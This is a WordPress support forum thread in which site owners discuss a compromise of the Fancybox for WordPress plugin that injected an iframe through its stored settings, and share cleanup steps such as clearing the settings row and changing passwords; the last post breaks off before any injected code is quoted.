Title: Fancybox Hack Last modified: August 22, 2016 --- # Fancybox Hack * [jiminy](https://wordpress.org/support/users/sharrock/) * (@sharrock) * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/) * A site I manage was a victim of this recent Fancybox Islamic State hack. I seemed to have removed it (code in the wp_options table), and uninstalled fancybox. Does anyone know if I need to do/remove something else * Thanks very much. * [https://wordpress.org/plugins/fancybox-for-wordpress/](https://wordpress.org/plugins/fancybox-for-wordpress/) Viewing 4 replies - 1 through 4 (of 4 total) * [paulg000](https://wordpress.org/support/users/paulg000/) * (@paulg000) * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882795) * One of the sites I developed also had this happen and I isolated it to this plugin. * Strange thing is I run this plugin on 9/10 sites yet have not experienced it w/any of them. * All software is up to date, I’d love some insight! * -Paul * [paulg000](https://wordpress.org/support/users/paulg000/) * (@paulg000) * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882796) * subscribing * [Jose Pardilla](https://wordpress.org/support/users/moskis/) * (@moskis) * [11 years, 3 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882800) * Hi, * Regarding fixing affected sites, from what I’ve seen it usually injected an iframe into the source of the site, stored in one of the plugin’s settings. In most cases this can be removed by reverting the plugin settings or manually checking the settings and finding the malicious code, removing it and saving the plugin’s settings. After doing that you can clear cache on the site and check your source code, to see there are no iframes or strange code added in the HEAD tag, especially between the and lines. * As I said, I have only seen the vulnerability used for the iframe injection. Nevertheless, for sites that were indeed affected by the issue it’s not a bad idea to change admin and db passwords to be sure. * For more info on the security issue that was found in February, please check [https://wordpress.org/plugins/fancybox-for-wordpress/faq/](https://wordpress.org/plugins/fancybox-for-wordpress/faq/) * [yst14](https://wordpress.org/support/users/yst14/) * (@yst14) * [11 years, 2 months ago](https://wordpress.org/support/topic/fancybox-hack/#post-5882810) * A clients website was unfortunately at the mercy of this attack. I have just deleted and reinstalled the fancybox plugin however the malicous code was still in place upon reinstalling. I found the padding setting within the ‘mfbfw’ row of my database to still have the malicous code. I removed all contents of this row and re-saved my settings within WordPress and the code seems to have gone and all good so far! * This is what I had in the row: `a:1:{s:7:"padding";s:110:"